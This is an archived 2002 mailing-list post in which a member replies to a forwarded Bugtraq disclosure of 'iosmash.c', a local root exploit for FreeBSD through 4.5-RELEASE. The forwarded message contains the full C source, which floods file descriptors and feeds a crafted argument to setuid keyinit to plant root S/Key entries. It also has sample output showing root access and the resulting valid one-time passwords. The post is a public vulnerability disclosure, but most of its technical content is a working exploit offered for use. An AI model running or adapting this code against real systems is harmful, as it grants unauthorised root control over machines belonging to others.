[luau] FreeBSD Local Root exploit... it works ;)

R. Scott Belford sctinc at flex.com
Tue Apr 23 11:56:20 PDT 2002


I did not think *bsd distros had such holes.  How long does it usually 
take the team to patch them?

scott

On Tuesday, April 23, 2002, at 08:01  AM, cpaul at telemetrybox.org wrote:

> ----- Forwarded message from Joshua Thayer <joshua at craigslist.org> -----
>
> Delivered-To: epsas at localhost.pdchawaii.com
> Envelope-to: cpaul at telemetrybox.org
> Date: Tue, 23 Apr 2002 10:57:16 -0700 (PDT)
> From: Joshua Thayer <joshua at craigslist.org>
> To: <cpaul at telemetrybox.org>
> Subject: cheers (fwd)
> X-Return-Path: joshua at craigslist.org
>
>
>
> ---------- Forwarded message ----------
> Date: Tue, 23 Apr 2002 10:42:49 -0700 (PDT)
> From: Eric Scheide <scheide at craigslist.org>
> To: Joshua Thayer <joshua at craigslist.org>
> Subject: cheers (fwd)
>
>
>
> --
> Eric Scheide, scheide at craigslist.org
> Chief Technology Officer
>
> ---------- Forwarded message ----------
> Date: Mon, 22 Apr 2002 23:24:08 -0700
> From: KF <dotslash at snosoft.com>
> To: bugtraq <bugtraq at securityfocus.org>, vuln-dev
> <vuln-dev at security-focus.com>
> Subject: cheers
>
> http://www.phased.home.ro/iosmash.c
>
> -KF
>
>
>
> /*
>   phased/b10z
>   phased at snosoft.com
>   23/04/2002
>
>   stdio kernel bug in All releases of FreeBSD up to and including 
> 4.5-RELEASE
>   decided to make a trivial exploit to easily get root :)
>
>> id
>   uid=1003(phased) gid=999(phased) groups=999(phased)
>> ./iosmash
>   Adding phased:
>   <--- HIT CTRL-C --->
>> su
>   s/key 98 snosoft2
>   Password:MASS OAT ROLL TOOL AGO CAM
>   xes#
>
>   this program makes the following skeys valid
>
>   95: CARE LIVE CARD LOFT CHIC HILL
>   96: TESS OIL WELD DUD MUTE KIT
>   97: DADE BED DRY JAW GRAB NOV
>   98: MASS OAT ROLL TOOL AGO CAM
>   99: DARK LEW JOLT JIVE MOS WHO
>
>   http://www.snosoft.com
>   cheers Joost Pol
> */
>
> #include <stdio.h>
> #include <unistd.h>
>
> int main(int argc, char *argv[]) {
> 	while(dup(1) != -1);
> 	close(2);
> 	execl("/usr/bin/keyinit",
> 	"\nroot 0099 snosoft2	6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
> }
>
>
>
> ----- End forwarded message -----
> _______________________________________________
> LUAU mailing list
> LUAU at videl.ics.hawaii.edu
> http://videl.ics.hawaii.edu/mailman/listinfo/luau
>




More information about the LUAU mailing list